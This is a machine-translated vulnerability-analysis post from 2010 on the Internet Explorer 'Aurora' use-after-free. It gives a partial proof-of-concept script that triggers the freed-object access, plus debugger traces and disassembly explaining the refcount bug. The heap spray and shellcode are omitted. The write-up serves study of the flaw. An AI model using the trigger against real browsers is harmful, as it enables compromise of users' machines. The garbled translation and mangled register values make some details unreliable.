IE Aurora vulnerability of the principles of the quest-bug warning-the black bar safety net

2010-02-01T00:00:00
ID MYHACK58:62201026122
Type myhack58
Reporter 佚名
Modified 2010-02-01T00:00:00

Description

Details: http://bbs.xfocusx.com/thread-7873-1-1.html by:xuanyuan small Cong The present article refer to the following article: [1]http://www.geoffchappell.com/viewer.htm?doc=notes/security/aurora/index.htm [2]http://securitylabs.websense.com/content/Blogs/3530.aspx [3]http://www.securityfocus.com/archive/1/508961

Wherein, [1]for this vulnerability to be extremely detailed commentary, the poor tell you how to debug, I just watched it to know the details on is how one thing, [2]it briefly to understand that, while[3]then speak directly to the Debug prompt.

Therefore, I'm here just to see the above referenced article after the extraordinaire debug it, on debugging and understanding the section order a bit, the view is not my own first drawn to.

Debug environment: XP sp3 Simplified Chinese version of the system, IE7(IE6 easier to jump into the shellcode, IE7 jump into the shellcode probability seems small, but this is mainly in order to discuss the vulnerability and how to, IE7, although don't jump into the shellcode, but also because of access to invalid address but an exception is thrown, can still break down, so does not affect the following.

The first observation of the PoC page, where the references to the heap spray, etc. is slightly off, full in the Annex:

Reference:

...... function ev1(evt)

{

event_obj = document. createEventObject(evt);

document. getElementById("sp1"). innerHTML = "";

window. setInterval(ev2, 1);

}

function ev2()

{

......

event_obj. srcElement;

}

......

<body>

<span id="sp1">

<img src="aurora.gif" >

</span>

</body>

Simply understood, the Body has a span object, a span object that contains an img object, img object onload in response to routine, call createEventObject create a corresponding event object of a copy, and then the span object's innerHtml empty, which leads to the img object to the release. After this, create a timer, the timeout routine in the access to the new event object's srcElement property, should be in this time to trigger the vulnerability.

winbg loaded IE7(PoC file named the command line parameters, IE7 appears web script or ActiveX objects are blocked prompt, and confirm are allowed to run, etc. for a long time after thrown off under

Reference:

(300.1 ec): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=001ec7b0 ebx=4 4 0 0 3 0 0 0 ecx=4 4 0 0 3 0 0 0 edx=0 0 2 0 6 4 1 8 esi=02b609d8 edi=ffffffff eip=3e5b1e60 esp=019df818 ebp=019df838 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0 0 2 3 ds=0 0 2 3 es=0 0 2 3 fs=003b gs=0 0 0 0 efl=0 0 0 1 0 2 0 6 mshtml! CElement::Doc: 3e5b1e60 8b01 mov eax,dword ptr [ecx] ds:0 0 2 3:4 4 0 0 3 0 0 0=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:0 0 5> kb ChildEBP RetAddr Args to Child 019df814 3e582b2b 001f8af8 01e23920 3e80f27c mshtml! CElement::Doc 019df838 3e67f828 01e23928 000003e9 019df870 mshtml! CEventObj::GenericGetElement+0x99 019df848 3e66d9c5 001ec768 01e23928 0 0 9 8 8 6 9 0 mshtml! CEventObj::get_srcElement+0x15 019df870 3e5b88a8 001ec768 0 0 9 8 8 6 9 0 001f8af8 mshtml! GS_IDispatchp+0x38 019df908 3e5b8dd9 001ec768 000003e9 3e66d989 mshtml! CBase::ContextInvokeEx+0x4ef 019df934 75be29d7 001ec768 000003e9 0 0 0 0 0 4 0 9 mshtml! CBase::InvokeEx+0x25 019df96c 75be2947 0 0 9 8 6 9 4 0 001caa30 000003e9 jscript! IDispatchExInvokeEx2+0xac 019df9a4 75be31e5 0 0 9 8 6 9 4 0 001caa30 000003e9 jscript! IDispatchExInvokeEx+0x56 019dfa14 75be1c0a 0 0 9 8 6 9 4 0 001caa30 000003e9 jscript! InvokeDispatchEx+0x78 019dfa5c 75be2fc3 0 0 9 8 6 9 4 0 019dfaac 0 0 0 0 0 0 0 2 jscript! VAR::InvokeByName+0xba 019dfb10 75be1123 019dfb54 0 0 0 0 0 0 0 0 009860b0 jscript! CScriptRuntime::Run+0xa7a 019dfb28 75be0f8a 019dfb54 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 jscript! ScrFncObj::Call+0x8d 019dfb98 75be2642 009860b0 019dfdb0 0 0 0 0 0 0 0 0 jscript! CSession::Execute+0xa7 019dfc88 75be24fe 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 019dfda0 jscript! NameTbl::InvokeDef+0x179 019dfd08 75be2e10 009860b0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 jscript! NameTbl::InvokeEx+0xcb 019dfd38 3e5a76df 009860b0 0 0 0 0 0 0 0 0 3e5b1414 jscript! NameTbl::Invoke+0x55 019dfdcc 3e5a763d 00204ee8 001c8060 0 0 0 0 2 0 0 0 mshtml! CWindow::ExecuteTimeoutScript+0x85 019dfe14 3e5a7611 001c97b8 001c97f1 019dfe48 mshtml! CWindow::FireTimeOut+0x91 019dfe24 3e5a77b5 0 0 0 0 2 0 0 0 019dfeb0 3e5b1551 mshtml! GWMouseProc+0x152 019dfe48 77d18734 0013020a 000000d6 0 0 0 0 2 0 0 0 mshtml! GlobalWndProc+0x181

From the stack backtrace to see that it is indeed in the timer routines used in event_obj. srcElement occurs when the abnormal.

Trigger the abnormal point is very easy to find, but to find why it is not easy.

The key is to understand CEventObj::get_srcElement how to achieve, why to achieve this is I read[1]Only after understanding. Simply put, in the event, to be able to access the corresponding Element, CEventObj is not directly in their class to save a CElement structure pointer, but around a few around: the CImgElement the object is created, create the corresponding CTreeNode object, by the CTreeNode object attributes stored in the CImgElement class pointer. Then the CTreeNode object of the address, stored in the img of the event object CEventObj Class A EVENTPARAM structures.

For this, reference[3]directly gives the Debug prompt:

Reference:

If you're interested in researching the vulnerability (using this PoC), breakpoint MSHTML! CImgElement::CImgElement, then run until MSHTML! CTreeNode::CTreeNode is hit -- this tree node is freed during MSHTML! CImgHelper::Fire_onerror, but is later accessed during MSHTML! CEventObj::get_srcElement.

Re-loaded in the system when the breakpoint is Enter the command bu mshtml! CImgElement::CImgElement, g run, stop at the breakpoint once, then again g running, IE7 appears web script or ActiveX objects are blocked prompt, and confirm are allowed to run, etc. for a long time let it Heap spray, then turn off in CImgElement::CImgElement

Reference:

Breakpoint 0 hit eax=002033d0 ebx=001ae3bc ecx=002033d0 edx=0 0 0 0 0 0 3 4 esi=001ae308 edi=0022ffe8 eip=3e553f4e esp=019dfb9c ebp=019dfba8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0 0 2 3 ds=0 0 2 3 es=0 0 2 3 fs=003b gs=0 0 0 0 efl=0 0 0 0 0 2 0 2 mshtml! CImgElement::CImgElement: 3e553f4e 8bff mov edi,edi

This get will create the CImgElement object pointer, ecx=ecx=002033d0

bu CTreeNode::CTreeNode, run off the lower

Reference:

0:0 0 5> bu mshtml! CTreeNode::CTreeNode 0:0 0 5> g Breakpoint 1 hit eax=02b60880 ebx=0 0 0 0 0 0 0 0 ecx=02b60880 edx=0 0 1 5 0 6 0 8 esi=001db518 edi=0 0 0 0 0 0 5 5 eip=3e586fe7 esp=019dfb7c ebp=019dfb90 iopl=0 nv up ei pl nz na po nc cs=001b ss=0 0 2 3 ds=0 0 2 3 es=0 0 2 3 fs=003b gs=0 0 0 0 efl=0 0 0 0 0 2 0 2 mshtml! CTreeNode::CTreeNode: 3e586fe7 8bff mov edi,edi 0:0 0 5> kb ChildEBP RetAddr Args to Child 019dfb78 3e53ffc3 0 0 2 0 3 3 8 0 002033d0 0 0 0 0 0 0 0 0 mshtml! CTreeNode::CTreeNode 019dfb90 3e551f3d 019dfbe0 002033d0 0 0 2 0 3 3 8 0 mshtml! CHtmRootParseCtx::BeginElement+0x37 019dfbb8 3e53ff25 019dfbe0 002033d0 0 0 2 0 3 3 8 0 mshtml! CHtmTextParseCtx::BeginElement+0x71 019dfbe4 3e54012b 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 mshtml! CHtmParse::BeginElement+0x8c 019dfc08 3e53eb07 0 0 0 0 0 0 0 0 0022ffe8 0 0 0 0 0 0 0 0 mshtml! CHtmParse::ParseBeginTag+0x112 019dfc20 3e53fad6 0 0 0 0 0 0 3 4 00fa84cc 001de4a8 mshtml! CHtmParse::ParseToken+0x76 019dfcc8 3e53b620 00fa84cc 001c7fb0 001de4a8 mshtml! CHtmPost::ProcessTokens+0x1a4 019dfd84 3e53bd97 00fa84cc 001c7fb0 001de4a8 mshtml! CHtmPost::Exec+0x15d 019dfd9c 3e53bd18 00fa84cc 001c7fb0 001de4a8 mshtml! CHtmPost::Run+0x13 019dfdb4 3e53c38f 001c7fb0 00fa84cc 001de4a8 mshtml! PostManExecute+0xdc 019dfdd4 3e53c2fc 001de4a8 0 0 0 0 0 0 0 1 019dfdf4 mshtml! PostManResume+0x9e 019dfde4 3e59f3ff 001fa800 001de4a8 019dfe28 mshtml! CHtmPost::OnDwnChanCallback+0x10 019dfdf4 3e5b79e2 001fa800 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 mshtml! CDwnChan::OnMethodCall+0x19 019dfe28 3e5b1602 019dfeb0 3e5b1551 0 0 0 0 0 0 0 0 mshtml! GlobalWndOnMethodCall+0x101 019dfe48 77d18734 000e021c 000000d4 0 0 0 0 0 0 0 0 mshtml! GlobalWndProc+0x181 019dfe74 77d18816 3e5b1551 000e021c 0 0 0 0 8 0 0 2 USER32! InternalCallWinProc+0x28 019dfedc 77d189cd 0 0 0 0 0 0 0 0 3e5b1551 000e021c USER32! UserCallWinProcCheckWow+0x150 019dff3c 77d18a10 019dff64 0 0 0 0 0 0 0 0 019dffb4 USER32! DispatchMessageWorker+0x306 019dff4c 3ed3e70b 019dff64 0013e490 0013e5b8 USER32! DispatchMessageW+0xf 019dffb4 7c80b699 001ab490 0013e490 0013e5b8 GETTING! CTabWindow::_TabWindowThreadProc+0x189

You can see it is by CHtmRootParseCtx::BeginElement calls, ecx=02b60880 for the CTreeNode class pointer, the function the second parameter 002033d0 it is just created CImgElement class pointer, the function calls CTreeNode::SetElement will be the CImgElement class CTreeNode Association:

Reference:

. text:3E586FEC push esi . text:3E586FED push [ebp+pCElementObject] . text:3E586FF0 mov esi, ecx . text:3E586FF2 or word ptr [esi+0Ah], 0FFFFh . text:3E586FF7 or word ptr [esi+0Ch], 0FFFFh . text:3E586FFC or word ptr [esi+0Eh], 0FFFFh . text:3E587001 mov dword ptr [esi+10h], 1 . text:3E587008 call CTreeNode::SetElement(CElement *)

Reference:

. text:3E586F69 . text:3E586F69 public: void __thiscall CTreeNode::SetElement(class CElement ) proc near . text:3E586F69 ; CODE XREF: CTreeNode::CTreeNode(CTreeNode ,CElement )+21p . text:3E586F69 . text:3E586F69 pCElementObject = dword ptr 8 . text:3E586F69 . text:3E586F69 mov edi, edi . text:3E586F6B push ebp . text:3E586F6C mov ebp, esp . text:3E586F6E mov eax, [ebp+pCElementObject] . text:3E586F71 test eax, eax . text:3E586F73 mov [ecx], eax . text:3E586F75 jz short loc_3E586F7D . text:3E586F75 . text:3E586F77 mov al, [eax+14h] . text:3E586F7A mov [ecx+8], al . text:3E586F7A . text:3E586F7D . text:3E586F7D loc_3E586F7D: ; CODE XREF: CTreeNode::SetElement(CElement )+Cj . text:3E586F7D pop ebp . text:3E586F7E retn 4 . text:3E586F7E . text:3E586F7E public: void __thiscall CTreeNode::SetElement(class CElement *) endp . text:3E586F7E

Step through the above section, after that, the web page code using the createEventObject to create the event a copy of the very embarrassing, this new CEventObj class, of course, copy the original object EVENTPARAM structure, but according to[1]explain, in the EVENTPARAM structure of the content is copy, and no increase in the CTreeNode of visit counts! CEvent::Create call EVENTPARAM::EVENTPARAM copy EVENTPARAM structure, but the latter code does not include operation wherein the CTreeNode(in the latter CEventObj::get_srcElement function analysis as can be seen, the CTreeNode class pointer in the EVENTPARAM structure of the head, increase the access count of the content.

Reference:

. text:3E6B4BC9 . text:3E6B4BC9 loc_3E6B4BC9: ; CODE XREF: CEventObj::Create(IHTMLEventObj * ,CDoc ,CElement ,CMarkup ,int,ushort ,EVENTPARAM ,int)+84j . text:3E6B4BC9 push 0D8h ; dwBytes . text:3E6B4BCE call _MemAlloc(x) . text:3E6B4BCE . text:3E6B4BD3 test eax, eax . text:3E6B4BD5 jz short loc_3E6B4BE3 . text:3E6B4BD5 . text:3E6B4BD7 push [ebp+arg_18] . text:3E6B4BDA mov ecx, eax . text:3E6B4BDC call EVENTPARAM::EVENTPARAM(EVENTPARAM const *) . text:3E6B4BDC . text:3E6B4BE1 jmp short loc_3E6B4BE5 . text:3E6B4BE1

. text:3E582A41 . text:3E582A41 public: __thiscall EVENTPARAM::EVENTPARAM(struct EVENTPARAM const ) proc near . text:3E582A41 ; CODE XREF: CElement::get_nodeType(long )-164050p . text:3E582A41 ; . text:3E5BFDC3p . text:3E582A41 ; . text:3E5C2363p . text:3E582A41 ; CElement::FireStdEvent_KeyHelper(CTreeNode ,CMessage ,int ,EVENTINFO )+7Ap . text:3E582A41 ; CElement::get_nodeType(long )-7B645p . text:3E582A41 ; CElement::get_nodeType(long )+5FEBp ... . text:3E582A41 . text:3E582A41 pEventParam = dword ptr 8 . text:3E582A41 . text:3E582A41 mov edi, edi . text:3E582A43 push ebp . text:3E582A44 mov ebp, esp . text:3E582A46 push ebx . text:3E582A47 mov ebx, ecx . text:3E582A49 push esi . text:3E582A4A mov esi, [ebp+pEventParam] . text:3E582A4D push edi . text:3E582A4E xor eax, eax . text:3E582A50 lea edi, [ebx+48h] . text:3E582A53 stosd . text:3E582A54 stosd . text:3E582A55 stosd . text:3E582A56 stosd . text:3E582A57 xor edx, edx . text:3E582A59 mov [ebx+0C4h], edx . text:3E582A5F mov [ebx+0C8h], edx . text:3E582A65 mov [ebx+0CCh], edx . text:3E582A6B mov [ebx+0D0h], edx . text:3E582A71 push 36h . text:3E582A73 pop ecx . text:3E582A74 mov edi, ebx . text:3E582A76 rep movsd ; directly copy the content . text:3E582A78 mov eax, [ebx+64h] . text:3E582A7B and dword ptr [ebx+0A8h], 0FFFFFBFFh . text:3E582A85 add dword ptr [eax+8], 8 . text:3E582A89 mov eax, [ebx+68h] . text:3E582A8C cmp eax, edx . text:3E582A8E jz short loc_3E582A94 . text:3E582A8E . text:3E582A90 add dword ptr [eax+8], 8 . text:3E582A90 . text:3E582A94 . text:3E582A94 loc_3E582A94: ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const )+4Dj . text:3E582A94 mov eax, [ebx+6Ch] . text:3E582A97 cmp eax, edx . text:3E582A99 jnz loc_3E6A4170 . text:3E582A99 . text:3E582A9F . text:3E582A9F loc_3E582A9F: ; CODE XREF: CElement::get_nodeType(long )+13875j . text:3E582A9F mov eax, [ebx+84h] . text:3E582AA5 cmp eax, edx . text:3E582AA7 jnz loc_3E6A4179 . text:3E582AA7 . text:3E582AAD jmp loc_3E6A4181 . text:3E582AAD . text:3E582AAD public: __thiscall EVENTPARAM::EVENTPARAM(struct EVENTPARAM const ) endp . text:3E582AAD . text:3E582AB2 . text:3E582AB2 loc_3E582AB2: ; CODE XREF: CElement::get_nodeType(long )+138EEj . text:3E582AB2 pop edi . text:3E582AB3 pop esi . text:3E582AB4 mov eax, ebx . text:3E582AB6 pop ebx . text:3E582AB7 pop ebp . text:3E582AB8 retn 4

. text:3E6A4170 . text:3E6A4170 loc_3E6A4170: ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const )+58j . text:3E6A4170 add dword ptr [eax+8], 8 . text:3E6A4174 jmp loc_3E582A9F . text:3E6A4174 . text:3E6A4179; --------------------------------------------------------------------------- . text:3E6A4179 . text:3E6A4179 loc_3E6A4179: ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const )+66j . text:3E6A4179 mov ecx, [eax] . text:3E6A417B push eax . text:3E6A417C call dword ptr [ecx+4] . text:3E6A417F xor edx, edx . text:3E6A417F . text:3E6A4181 . text:3E6A4181 loc_3E6A4181: ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const *)+6cj identified at . text:3E6A4181 mov eax, [ebp+lpMem] . text:3E6A4184 add eax, 0C4h . text:3E6A4189 lea ecx, [ebx+0C4h] . text:3E6A418F push eax . text:3E6A4190 mov [ecx], edx . text:3E6A4192 call CStr::Set(CStr const &) . text:3E6A41 9 2 . text:3E6A4197 mov esi, [ebp+lpMem] . text:3E6A419A lea eax, [esi+0C8h] . text:3E6A41A0 lea ecx, [ebx+0C8h] . text:3E6A41A6 xor edi, edi . text:3E6A41A8 push eax . text:3E6A41A9 mov [ecx], edi . text:3E6A41AB call CStr::Set(CStr const &) . text:3E6A41AB . text:3E6A41B0 lea eax, [esi+0CCh] . text:3E6A41B6 lea ecx, [ebx+0CCh] . text:3E6A41BC push eax . text:3E6A41BD mov [ecx], edi . text:3E6A41BF call CStr::Set(CStr const &) . text:3E6A41BF . text:3E6A41C4 lea eax, [esi+0D0h] . text:3E6A41CA lea ecx, [ebx+0D0h] . text:3E6A41D0 push eax . text:3E6A41D1 mov [ecx], edi . text:3E6A41D3 call CStr::Set(CStr const &) . text:3E6A41D3 . text:3E6A41D8 lea ecx, [ebx+48h] . text:3E6A41DB xor eax, eax . text:3E6A41DD mov edi, ecx . text:3E6A41DF stosd . text:3E6A41E0 stosd . text:3E6A41E1 add esi, 48h . text:3E6A41E4 stosd . text:3E6A41E5 push esi ; pvargSrc . text:3E6A41E6 push ecx ; pvargDest . text:3E6A41E7 stosd . text:3E6A41E8 call VariantCopy(x,x) . text:3E6A41E8 . text:3E6A41ED jmp loc_3E582AB2 . text:3E6A41ED